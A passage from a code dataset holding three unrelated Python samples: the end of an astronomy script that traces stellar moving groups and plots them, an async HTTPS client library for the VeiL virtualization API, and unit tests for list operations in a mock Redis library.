mgpmaster.append({'x':x,'ex':ex,'y':y,'ey':ey,'z':z,'ez':ez,'xy':xy,'exy':exy,'xz':xz,'exz':exz,'yz':yz,'eyz':eyz,'a':a,'ea':ea,'b':b,'eb':eb,'c':c,'ec':ec})
#Output all the particulars of the moving group at this timestep T.
outfile.write("{0:8.1f} {1:12.3f} {2:12.3f} {3:12.3f} {4:12.3f} {5:12.3f} {6:12.3f} {7:12.4f} {8:12.4f} {9:12.4f} {10:12.4f} {11:12.4f} {12:12.4f} {13:12.4f} {14:12.4f} {15:12.4f} {16:12.4f} {17:12.4f} {18:12.4f}\n".format(times[k],mgpmaster[k]['x'],mgpmaster[k]['ex'],mgpmaster[k]['y'],mgpmaster[k]['ey'],mgpmaster[k]['z'],mgpmaster[k]['ez'],mgpmaster[k]['a'],mgpmaster[k]['ea'],mgpmaster[k]['b'],mgpmaster[k]['eb'],mgpmaster[k]['c'],mgpmaster[k]['ec'],mgpmaster[k]['xy'],mgpmaster[k]['exy'],mgpmaster[k]['xz'],mgpmaster[k]['exz'],mgpmaster[k]['yz'],mgpmaster[k]['eyz']))
#Progress report every 1 Myr
if (times[k]%1)==0: print('Stars traced back to '+str(times[k])+' Myr')
outfile.close()
#####################################################
### Flatten everything! Now we can plot all our ###
### iterations at once (for the waterfall diagram ###
### and the 3D explosion plot) ###
#####################################################
# flatten by one dimension; we now have N*I stars at every time T.
mgp_x = np.reshape(mgp_x,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
mgp_y = np.reshape(mgp_y,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
mgp_z = np.reshape(mgp_z,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
## rotate so that each strip contains n_stars*n_int elements for a given time.
## (it's easier to plot)
#mgp_x = np.rot90(mgp_x,3)
#mgp_y = np.rot90(mgp_y,3)
#mgp_z = np.rot90(mgp_z,3)
#times = np.rot90([times],3)
#mgp_color = np.reshape(mgp_color,-1)
#######################################################
### Draw a traceback plot of all N*I stars relative ###
### to their computed center, to show the behavior ###
### of the moving group itself. This is the ###
### "waterfall diagram" ###
#######################################################
fig2 = pyplot.figure(figsize=(9.6,5.4),dpi=600)
ax2 = fig2.add_subplot(111)
ax2.set_ylim((0,200))
ax2.set_xlim((0,timespan))
ax2.set_xlabel('Time (Myr)')
ax2.set_ylabel('(pc)')
fig2.canvas.draw()
line = ax2.plot([0,1],[0,1],color=(1,1,1,0.1),linewidth=1)
line = line[0]
poly = ax2.add_patch(patches.Polygon([[0,1],[1,2],[2,0]],closed=True,facecolor=(1,1,1,0.15), edgecolor='none'))
#ax2.set_title('{0:} {1:} traceback'.format(mgpname,method))
a = []
b = []
c = []
x = []
y = []
z = []
for q in range(len(times)):
a.append(mgpmaster[q]["a"])
b.append(mgpmaster[q]["b"])
c.append(mgpmaster[q]["c"])
x.append(mgpmaster[q]["x"])
y.append(mgpmaster[q]["y"])
z.append(mgpmaster[q]["z"])
a = np.asarray(a)
b = np.asarray(b)
c = np.asarray(c)
x = np.asarray(x)
y = np.asarray(y)
z = np.asarray(z)
print a
# Control the crowding/density of the plots. Only plot 30,000 curves regardless of how many there really are.
if n_stars*n_int > 30000:
p = np.asarray(np.ceil(np.random.rand(30000)*(n_stars*n_int-1)),np.int)
else:
p = np.arange(0,(n_stars*n_int-1),1)
mgpdist = np.sqrt((mgp_x[p,:] - x)**2 + (mgp_y[p,:] - y)**2 + (mgp_z[p,:] - z)**2)
for cntr in range(len(mgpdist)):
line.set_data(times,mgpdist[cntr])
line.set_linewidth(0.2)
line.set_color((0,0,0,0.05))
ax2.draw_artist(line)
line.set_data(times,(a*b*c)**(1/3.))
line.set_color((1,0,0,0.5))
line.set_linewidth(1)
ax2.draw_artist(line)
x = np.concatenate((times,times[::-1],[times[0]]))
mgprad = (a*b*c)**(1/3.)
mg = np.concatenate((mgprad,np.zeros_like(mgprad),[mgprad[0]]))
poly.set_xy(zip(*(x,mg)))
poly.set_facecolor((1,0,0,0.2))
ax2.draw_artist(poly)
poly.set_xy(zip(*([mgpage,mgpage,mgpage2,mgpage2,mgpage],[0,500,500,0,0])))
poly.set_facecolor((0,0,1,0.2))
ax2.draw_artist(poly)
save(fig2,'Trace_{0:}_{1:}.png'.format(mgpname,method))
fig2.clf()
pyplot.close()
if __name__ == "__main__":
if len(sys.argv) == 0:
print "tracewing_mgp.py <inputfile> <group> <method> <minage> <maxage> <maxplotage> <maxsimage>"
else:
traceback()
| StarcoderdataPython |
6473167 | # -*- coding: utf-8 -*-
"""Veil https api client."""
import asyncio
import json
import logging
from types import TracebackType
from typing import Dict, Optional, Type
from urllib.parse import urlencode
from uuid import UUID, uuid4
try:
import ujson
except ImportError: # pragma: no cover
ujson = None
try:
import aiohttp
except ImportError: # pragma: no cover
aiohttp = None
from .api_objects import (VeilCluster, VeilController, VeilDataPool,
VeilDomainExt, VeilEvent, VeilLibrary, VeilNode, VeilResourcePool,
VeilVDisk)
from .base import VeilRetryConfiguration, VeilTag, VeilTask
from .base.api_cache import VeilCacheConfiguration, cached_response
from .base.utils import (IntType, NullableDictType, VeilJwtTokenType,
VeilUrlStringType, veil_api_response)
logger = logging.getLogger('veil-api-client.request')
logger.addHandler(logging.NullHandler())
class _RequestContext:
"""Custom aiohttp.RequestContext class for request retry logic.
Attributes:
request: aiohttp.request operation (POST, GET, etc).
url: request url
num_of_attempts: num of retry attempts if request failed.
timeout: base try timeout time (with exponential grow).
max_timeout: max timeout between tries.
timeout_increase_step: timeout increase step.
status_codes: collection of response status codes witch must be repeated.
exceptions: collection of aiohttp exceptions witch must be repeated.
kwargs: additional aiohttp.request arguments, such as headers and etc.
"""
def __init__(self,
request: aiohttp.ClientRequest,
url: str,
num_of_attempts: int,
timeout: int,
max_timeout: int,
timeout_increase_step: int,
status_codes: set,
exceptions: set,
**kwargs
) -> None:
"""Please see help(_RequestContext) for more info."""
self._request = request
self._url = url
self._num_of_attempts = num_of_attempts
self._timeout = timeout
self._max_timeout = max_timeout
self._timeout_increase_step = timeout_increase_step
if status_codes is None:
status_codes = set()
self._status_codes = status_codes
if exceptions is None:
exceptions = set()
self._exceptions = exceptions
self._kwargs = kwargs
self._current_attempt = 0
self._response = None
@property
def _exp_timeout(self) -> float:
"""Retry request timeout witch can exponentially grow."""
timeout = self._timeout * (self._timeout_increase_step ** (self._current_attempt - 1))
return min(timeout, self._max_timeout)
def _bad_code(self, code: int) -> bool:
"""Check that request status_code is bad."""
return 500 <= code <= 599 or code in self._status_codes
async def _execute_request(self) -> aiohttp.ClientResponse:
"""Run client request on aiohttp."""
try:
self._current_attempt += 1
if self._current_attempt > 1:
logger.debug('Request %s attempt', self._current_attempt)
response = await self._request(self._url, **self._kwargs)
code = response.status
if self._current_attempt < self._num_of_attempts and self._bad_code(code):
await asyncio.sleep(self._exp_timeout)
return await self._execute_request()
self._response = response
return response
except Exception as e:
if self._current_attempt < self._num_of_attempts:
for exc in self._exceptions:
if isinstance(e, exc):
await asyncio.sleep(self._exp_timeout)
return await self._execute_request()
raise e
async def __aenter__(self) -> aiohttp.ClientResponse:
return await self._execute_request()
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
if self._response is not None:
if not self._response.closed:
self._response.close()
class VeilClient:
"""VeilClient class.
Private attributes:
__AUTH_HEADER_KEY: Header authorization key.
__USER_AGENT_VAL: Header user-agent value.
__TRANSFER_PROTOCOL_PREFIX: force to use only HTTPS.
Attributes:
server_address: VeiL server address (without protocol).
token: VeiL auth token.
ssl_enabled: ssl-certificate validation.
session_reopen: auto reopen aiohttp.ClientSession when it`s closed.
timeout: aiohttp.ClientSession total timeout.
extra_headers: additional user headers.
extra_params: additional user params.
cookies: additional user cookies (probably useless).
ujson_: ujson using instead of default aiohttp.ClientSession serializer.
retry_opts: VeilRetryConfiguration instance.
cache_opts: VeilCacheConfiguration instance.
url_max_length: maximum url length (protocol + domain + query params)
"""
__TRANSFER_PROTOCOL_PREFIX = 'https://'
__AUTH_HEADER_KEY = 'Authorization'
__USER_AGENT_VAL = 'veil-api-client/2.2'
__IDEMPOTENCY_BODY_KEY = 'idempotency_key'
__extra_headers = NullableDictType('__extra_headers')
__extra_params = NullableDictType('__extra_params')
__cookies = NullableDictType('__cookies')
server_address = VeilUrlStringType('server_address')
token = VeilJwtTokenType('token')
def __init__(self, server_address: str,
token: str,
ssl_enabled: bool = True,
session_reopen: bool = False,
timeout: int = 5 * 60,
extra_headers: Optional[dict] = None,
extra_params: Optional[dict] = None,
cookies: Optional[dict] = None,
ujson_: bool = True,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None,
url_max_length: Optional[int] = None,
) -> None:
"""Please see help(VeilClient) for more info."""
if aiohttp is None:
raise RuntimeError('Please install `aiohttp`') # pragma: no cover
if ujson is None and ujson_:
raise RuntimeError('Please install `ujson`') # pragma: no cover
self.server_address = server_address
self.token = token
self.__session_reopen = session_reopen
self.__ssl_enabled = ssl_enabled
self.__extra_headers = extra_headers
self.__extra_params = extra_params
__timeout = aiohttp.ClientTimeout(total=timeout)
self.__timeout = __timeout
self.__cookies = cookies
# ujson is much faster but less compatible
self.__json_serialize = ujson.dumps if ujson_ else json.dumps
if not retry_opts:
retry_opts = VeilRetryConfiguration()
self.__retry_opts = retry_opts
# cache options that can be used in request caching decorator
if not cache_opts:
cache_opts = VeilCacheConfiguration(cache_client=None, ttl=0)
self.__cache_opts = cache_opts
self.__url_max_length = url_max_length
self.__client_session = self.new_client_session
async def __aenter__(self) -> 'VeilClient':
"""Async context manager enter."""
return self
async def __aexit__(self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
"""Async context manager exit."""
await self.__session.close()
async def close(self) -> None:
"""Session close."""
await self.__session.close()
@property
def new_client_session(self) -> 'aiohttp.ClientSession':
"""Return new ClientSession instance."""
# TODO: DeprecationWarning: The object should be created from async function
return aiohttp.ClientSession(timeout=self.__timeout, cookies=self.__cookies,
json_serialize=self.__json_serialize)
@property
def base_url(self) -> str:
"""Build controller api url."""
return ''.join([self.__TRANSFER_PROTOCOL_PREFIX, self.server_address, '/api/'])
@property
def __base_params(self) -> Dict[str, int]:
"""All requests to VeiL should be async by default."""
return {'async': 1}
@property
def __params(self) -> Dict:
"""Return base params extended by user extra params."""
params = self.__base_params
if self.__extra_params and isinstance(self.__extra_params, dict):
params.update(self.__extra_params)
return params
@property
def __base_headers(self) -> Dict[str, str]:
"""Return preconfigured request headers.
Note:
response should be json encoded on utf-8 and EN locale.
"""
headers_dict = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Accept-Charset': 'utf-8',
'User-Agent': self.__USER_AGENT_VAL,
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Accept-Language': 'en',
self.__AUTH_HEADER_KEY: '{}'.format(self.token),
}
return headers_dict
@property
def __headers(self) -> Dict[str, str]:
"""Return base_headers extended by user extra_headers."""
headers = self.__base_headers
if self.__extra_headers and isinstance(self.__extra_headers, dict):
headers.update(self.__extra_headers)
return headers
@property
def __session(self) -> 'aiohttp.ClientSession':
"""Return connection ClientSession."""
if self.__client_session.closed and self.__session_reopen:
self.__client_session = self.new_client_session
return self.__client_session
def __request_context(self,
request: aiohttp.ClientRequest,
url: str,
headers: dict,
params: dict,
ssl: bool,
retry_opts: VeilRetryConfiguration,
json_data: Optional[dict] = None):
"""Create new _RequestContext instance."""
# protocol + domain + query args
if self.__url_max_length:
full_url = '{url}?{params}'.format(url=url, params=urlencode(params))
if len(full_url) > self.__url_max_length:
raise AssertionError('The maximum url length is set and exceeded.')
# User-friendly magic - convert all UUID values to a str
if isinstance(json_data, dict):
for key, value in json_data.items():
try:
if isinstance(value, UUID):
logger.warning('JSON can`t contain a UUID -> converting %s to a str',
value)
json_data[key] = str(value)
except ValueError:
json_data[key] = value
return _RequestContext(request=request, url=url, headers=headers, params=params,
ssl=ssl, json=json_data,
num_of_attempts=retry_opts.num_of_attempts,
timeout=retry_opts.timeout,
max_timeout=retry_opts.max_timeout,
timeout_increase_step=retry_opts.timeout_increase_step,
status_codes=retry_opts.status_codes,
exceptions=retry_opts.exceptions)
@staticmethod
async def __fetch_response_data(response: aiohttp.ClientResponse) -> Dict[str, str]:
"""Collect all response attributes."""
if isinstance(response, aiohttp.ClientResponse):
# Collect response data
async with response:
status_code = response.status
headers = response.headers
# If VeiL ECP is not fully turned on, the responses may be of the wrong type
try:
data = await response.json()
except aiohttp.ContentTypeError:
logger.debug('VeiL response has wrong content type.')
data = dict()
return dict(status_code=status_code, headers=dict(headers), data=data)
async def __api_retry_request(self, method_name: str,
url: str,
headers: dict,
params: dict,
ssl: bool,
json_data: Optional[dict] = None,
retry_opts: Optional[VeilRetryConfiguration] = None) -> Dict[str, str]: # noqa: E501
"""Log parameters and execute passed aiohttp method with retry options."""
# VeiL can`t decode requests witch contain extra commas
for argument, value in params.items():
if isinstance(value, str) and value[-1] == ',':
params[argument] = value[:-1]
# If request retry_opts are not defined - use Class attr value.
if not retry_opts:
retry_opts = self.__retry_opts
# log request
logger.debug('ssl: %s, url: %s, header: %s, params: %s, json: %s', self.__ssl_enabled,
url, self.__headers, params, json_data)
# determine aiohttp.client method to call
aiohttp_request_method = getattr(self.__session, method_name)
# create aiohttp.request witch can be retried.
aiohttp_request = self.__request_context(request=aiohttp_request_method,
url=url,
headers=headers,
params=params,
ssl=ssl,
json_data=json_data,
retry_opts=retry_opts)
# execute request and fetch response data
async with aiohttp_request as aiohttp_response:
return await self.__fetch_response_data(aiohttp_response)
@veil_api_response
@cached_response
async def api_request(self,
method_name: str,
url: str,
headers: dict,
params: dict,
ssl: bool,
json_data: Optional[dict] = None,
retry_opts: Optional[VeilRetryConfiguration] = None
):
"""Api_retry interface.
Note:
Override me to extend standard behaviour.
"""
return await self.__api_retry_request(method_name=method_name,
url=url,
headers=headers,
params=params,
ssl=ssl,
json_data=json_data,
retry_opts=retry_opts)
async def get(self, api_object, url: str,
extra_params: Optional[dict] = None,
extra_headers: Optional[dict] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
"""Send GET request to VeiL ECP."""
params = self.__params
if extra_params:
params.update(extra_params)
headers = self.__headers
if extra_headers:
headers.update(extra_headers)
if not cache_opts:
cache_opts = self.__cache_opts
logger.debug('%s GET request.', api_object.__class__.__name__)
return await self.api_request(api_object=api_object,
method_name='get',
url=url,
headers=headers,
params=params,
ssl=self.__ssl_enabled,
retry_opts=retry_opts,
cache_opts=cache_opts)
async def post(self, api_object,
url: str,
json_data: Optional[dict] = None,
extra_params: Optional[dict] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
"""Send POST request to VeiL ECP."""
if isinstance(json_data, dict):
json_data[self.__IDEMPOTENCY_BODY_KEY] = '{}'.format(uuid4())
params = self.__params
if extra_params:
params.update(extra_params)
if not cache_opts:
cache_opts = self.__cache_opts
logger.debug('%s POST request.', api_object.__class__.__name__)
return await self.api_request(api_object=api_object,
method_name='post', url=url,
headers=self.__headers,
params=params,
ssl=self.__ssl_enabled,
json_data=json_data,
retry_opts=retry_opts,
cache_opts=cache_opts)
async def put(self, api_object,
url: str,
json_data: Optional[dict] = None,
extra_params: Optional[dict] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> Dict[str, str]:
"""Send PUT request to VeiL ECP."""
params = self.__params
if extra_params:
params.update(extra_params)
if not cache_opts:
cache_opts = self.__cache_opts
logger.debug('%s PUT request.', api_object.__class__.__name__)
return await self.api_request(api_object=api_object,
method_name='put',
url=url,
headers=self.__headers,
params=params,
ssl=self.__ssl_enabled,
json_data=json_data,
retry_opts=retry_opts,
cache_opts=cache_opts)
def domain(self,
domain_id: Optional[str] = None,
resource_pool: Optional[str] = None,
cluster_id: Optional[str] = None,
node_id: Optional[str] = None,
data_pool_id: Optional[str] = None,
template: Optional[bool] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilDomainExt':
"""Return VeilDomainV entity."""
return VeilDomainExt(client=self,
template=template,
api_object_id=domain_id,
resource_pool=resource_pool,
cluster_id=cluster_id,
node_id=node_id,
data_pool_id=data_pool_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def controller(self, controller_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilController':
"""Return VeilController entity."""
return VeilController(client=self, api_object_id=controller_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def resource_pool(self, resource_pool_id: Optional[str] = None,
node_id: Optional[str] = None,
cluster_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilResourcePool': # noqa: E501
"""Return VeilResourcePool entity."""
return VeilResourcePool(client=self,
api_object_id=resource_pool_id,
node_id=node_id,
cluster_id=cluster_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def cluster(self, cluster_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilCluster':
"""Return VeilCluster entity."""
return VeilCluster(client=self, api_object_id=cluster_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def data_pool(self, data_pool_id: Optional[str] = None,
node_id: Optional[str] = None,
cluster_id: Optional[str] = None,
resource_pool_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilDataPool':
"""Return VeilDataPool entity."""
return VeilDataPool(client=self,
api_object_id=data_pool_id,
node_id=node_id,
cluster_id=cluster_id,
resource_pool_id=resource_pool_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def node(self, node_id: Optional[str] = None,
cluster_id: Optional[str] = None,
resource_pool_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilNode':
"""Return VeilNode entity."""
return VeilNode(client=self,
api_object_id=node_id,
cluster_id=cluster_id,
resource_pool_id=resource_pool_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def vdisk(self, vdisk_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilVDisk':
"""Return VeilVDisk entity."""
return VeilVDisk(client=self, api_object_id=vdisk_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def task(self, task_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilTask':
"""Return VeilTask entity."""
return VeilTask(client=self, api_object_id=task_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def tag(self, tag_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilTag':
"""Return VeilTag entity."""
return VeilTag(client=self, api_object_id=tag_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def library(self, library_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilLibrary':
"""Return VeilLibrary entity."""
return VeilLibrary(client=self, api_object_id=library_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
def event(self, event_id: Optional[str] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
cache_opts: Optional[VeilCacheConfiguration] = None) -> 'VeilEvent': # noqa: E501
"""Return VeilResourcePool entity."""
return VeilEvent(client=self,
api_object_id=event_id,
retry_opts=retry_opts,
cache_opts=cache_opts)
class VeilClientSingleton:
"""Contains previously initialized clients to minimize sessions on the VeiL controller.
If you have always running application, such as Tornado web-server and you need to
persistent VeiL ECP connections.
"""
__client_instances = dict()
__TIMEOUT = IntType('__TIMEOUT')
def __init__(self, timeout: int = 5 * 60,
cache_opts: Optional[VeilCacheConfiguration] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
url_max_length: Optional[int] = None) -> None:
"""Please see help(VeilClientSingleton) for more info."""
self.__TIMEOUT = timeout
self.__CACHE_OPTS = cache_opts
self.__RETRY_OPTS = retry_opts
self.__URL_MAX_LENGTH = url_max_length
def add_client(self, server_address: str, token: str,
timeout: Optional[int] = None,
cache_opts: Optional[VeilCacheConfiguration] = None,
retry_opts: Optional[VeilRetryConfiguration] = None,
url_max_length: Optional[int] = None) -> 'VeilClient':
"""Create new instance of VeilClient if it is not initialized on same address.
Attributes:
server_address: VeiL server address (without protocol).
token: VeiL auth token.
timeout: aiohttp.ClientSession total timeout.
"""
if not timeout:
timeout = self.__TIMEOUT
if not cache_opts:
cache_opts = self.__CACHE_OPTS
if not retry_opts:
retry_opts = self.__RETRY_OPTS
if not url_max_length:
url_max_length = self.__URL_MAX_LENGTH
# create a new client if not exist before.
if server_address not in self.__client_instances:
instance = VeilClient(server_address=server_address, token=token,
session_reopen=True,
timeout=timeout,
ujson_=True,
cache_opts=cache_opts,
retry_opts=retry_opts,
url_max_length=url_max_length)
self.__client_instances[server_address] = instance
return self.__client_instances[server_address]
async def remove_client(self, server_address: str) -> None:
"""Remove and close existing VeilClient instance."""
if server_address in self.__client_instances:
_client = self.__client_instances.pop(server_address)
await _client.close()
@property
def instances(self) -> dict:
"""Show all instances of VeilClient."""
return self.__client_instances
| StarcoderdataPython |
9648633 | <gh_stars>100-1000
from contextlib import contextmanager
import time
from nose.tools import assert_less, assert_raises, eq_
from mockredis.tests.fixtures import setup, teardown
from mockredis.tests.test_constants import (
LIST1, LIST2, VAL1, VAL2, VAL3, VAL4,
bLIST1, bVAL1, bVAL2, bVAL3, bVAL4,
)
@contextmanager
def assert_elapsed_time(expected=1.0, delta=2.0):
"""
Validate that work encapsulated by this context manager
takes at least and is within a delta of the expected amount of time.
"""
start = time.time()
yield
diff = time.time() - start
assert_less(expected, diff)
assert_less(diff, expected + delta)
class TestRedisList(object):
"""list tests"""
def setup(self):
setup(self)
def teardown(self):
teardown(self)
def test_initially_empty(self):
"""
List is created empty.
"""
eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
def test_llen(self):
eq_(0, self.redis.llen(LIST1))
self.redis.lpush(LIST1, VAL1, VAL2)
eq_(2, self.redis.llen(LIST1))
self.redis.lpop(LIST1)
eq_(1, self.redis.llen(LIST1))
self.redis.lpop(LIST1)
eq_(0, self.redis.llen(LIST1))
def test_lindex(self):
eq_(None, self.redis.lindex(LIST1, 0))
eq_(False, self.redis.exists(LIST1))
self.redis.rpush(LIST1, VAL1, VAL2)
eq_(bVAL1, self.redis.lindex(LIST1, 0))
eq_(bVAL2, self.redis.lindex(LIST1, 1))
eq_(None, self.redis.lindex(LIST1, 2))
eq_(bVAL2, self.redis.lindex(LIST1, -1))
eq_(bVAL1, self.redis.lindex(LIST1, -2))
eq_(None, self.redis.lindex(LIST1, -3))
self.redis.lpop(LIST1)
eq_(bVAL2, self.redis.lindex(LIST1, 0))
eq_(None, self.redis.lindex(LIST1, 1))
def test_lpop(self):
self.redis.rpush(LIST1, VAL1, VAL2)
eq_(bVAL1, self.redis.lpop(LIST1))
eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
eq_(bVAL2, self.redis.lpop(LIST1))
eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
eq_(None, self.redis.lpop(LIST1))
eq_([], self.redis.keys("*"))
def test_blpop(self):
self.redis.rpush(LIST1, VAL1, VAL2)
eq_((bLIST1, bVAL1), self.redis.blpop((LIST1, LIST2)))
eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
eq_((bLIST1, bVAL2), self.redis.blpop(LIST1))
eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
timeout = 1
with assert_elapsed_time(expected=timeout):
eq_(None, self.redis.blpop(LIST1, timeout))
def test_lpush(self):
"""
Insertion maintains order but not uniqueness.
"""
# lpush two values
eq_(1, self.redis.lpush(LIST1, VAL1))
eq_(2, self.redis.lpush(LIST1, VAL2))
# validate insertion
eq_(b"list", self.redis.type(LIST1))
eq_([bVAL2, bVAL1], self.redis.lrange(LIST1, 0, -1))
# insert two more values with one repeated
eq_(4, self.redis.lpush(LIST1, VAL1, VAL3))
# validate the update
eq_(b"list", self.redis.type(LIST1))
eq_([bVAL3, bVAL1, bVAL2, bVAL1],
self.redis.lrange(LIST1, 0, -1))
def test_rpop(self):
self.redis.rpush(LIST1, VAL1, VAL2)
eq_(bVAL2, self.redis.rpop(LIST1))
eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
eq_(bVAL1, self.redis.rpop(LIST1))
eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
eq_(None, self.redis.rpop(LIST1))
eq_([], self.redis.keys("*"))
def test_brpop(self):
self.redis.rpush(LIST1, VAL1, VAL2)
eq_((bLIST1, bVAL2), self.redis.brpop((LIST2, LIST1)))
eq_(1, len(self.redis.lrange(LIST1, 0, -1)))
eq_((bLIST1, bVAL1), self.redis.brpop(LIST1))
eq_(0, len(self.redis.lrange(LIST1, 0, -1)))
timeout = 1
with assert_elapsed_time(expected=timeout):
eq_(None, self.redis.brpop(LIST1, timeout))
eq_([], self.redis.keys("*"))
def test_rpush(self):
"""
Insertion maintains order but not uniqueness.
"""
# rpush two values
eq_(1, self.redis.rpush(LIST1, VAL1))
eq_(2, self.redis.rpush(LIST1, VAL2))
# validate insertion
eq_(b"list", self.redis.type(LIST1))
eq_([bVAL1, bVAL2], self.redis.lrange(LIST1, 0, -1))
# insert two more values with one repeated
eq_(4, self.redis.rpush(LIST1, VAL1, VAL3))
# validate the update
eq_(b"list", self.redis.type(LIST1))
eq_([bVAL1, bVAL2, bVAL1, bVAL3],
self.redis.lrange(LIST1, 0, -1))
def test_lrem(self):
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(2, self.redis.lrem(LIST1, VAL1, 0))
eq_([bVAL2, bVAL3, bVAL4, bVAL2],
self.redis.lrange(LIST1, 0, -1))
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(1, self.redis.lrem(LIST1, VAL2, 1))
eq_([bVAL1, bVAL1, bVAL3, bVAL4, bVAL2],
self.redis.lrange(LIST1, 0, -1))
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(2, self.redis.lrem(LIST1, VAL1, 100))
eq_([bVAL2, bVAL3, bVAL4, bVAL2],
self.redis.lrange(LIST1, 0, -1))
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(1, self.redis.lrem(LIST1, VAL3, -1))
eq_([bVAL1, bVAL2, bVAL1, bVAL4, bVAL2],
self.redis.lrange(LIST1, 0, -1))
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(1, self.redis.lrem(LIST1, VAL2, -1))
eq_([bVAL1, bVAL2, bVAL1, bVAL3, bVAL4],
self.redis.lrange(LIST1, 0, -1))
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1, VAL2, VAL1, VAL3, VAL4, VAL2)
eq_(2, self.redis.lrem(LIST1, VAL2, -2))
eq_([bVAL1, bVAL1, bVAL3, bVAL4],
self.redis.lrange(LIST1, 0, -1))
# string conversion
self.redis.rpush(1, 1, "2", 3)
eq_(1, self.redis.lrem(1, "1"))
eq_(1, self.redis.lrem("1", 2))
eq_([b"3"], self.redis.lrange(1, 0, -1))
del self.redis["1"]
del self.redis[LIST1]
self.redis.rpush(LIST1, VAL1)
eq_(1, self.redis.lrem(LIST1, VAL1))
eq_([], self.redis.lrange(LIST1, 0, -1))
eq_([], self.redis.keys("*"))
eq_(0, self.redis.lrem("NON_EXISTENT_LIST", VAL1, 0))
def test_brpoplpush(self):
self.redis.rpush(LIST1, VAL1, VAL2)
self.redis.rpush(LIST2, VAL3, VAL4)
transfer_item = self.redis.brpoplpush(LIST1, LIST2)
eq_(bVAL2, transfer_item)
eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
eq_([bVAL2, bVAL3, bVAL4],
self.redis.lrange(LIST2, 0, -1))
transfer_item = self.redis.brpoplpush(LIST1, LIST2)
eq_(bVAL1, transfer_item)
eq_([], self.redis.lrange(LIST1, 0, -1))
eq_([bVAL1, bVAL2, bVAL3, bVAL4],
self.redis.lrange(LIST2, 0, -1))
timeout = 1
with assert_elapsed_time(expected=timeout):
eq_(None, self.redis.brpoplpush(LIST1, LIST2, timeout))
def test_rpoplpush(self):
self.redis.rpush(LIST1, VAL1, VAL2)
self.redis.rpush(LIST2, VAL3, VAL4)
transfer_item = self.redis.rpoplpush(LIST1, LIST2)
eq_(bVAL2, transfer_item)
eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
eq_([bVAL2, bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
def test_rpoplpush_with_empty_source(self):
# source list is empty
del self.redis[LIST1]
self.redis.rpush(LIST2, VAL3, VAL4)
transfer_item = self.redis.rpoplpush(LIST1, LIST2)
eq_(None, transfer_item)
eq_([], self.redis.lrange(LIST1, 0, -1))
# nothing has been added to the destination queue
eq_([bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
def test_rpoplpush_source_with_empty_string(self):
# source list contains empty string
self.redis.rpush(LIST1, '')
self.redis.rpush(LIST2, VAL3, VAL4)
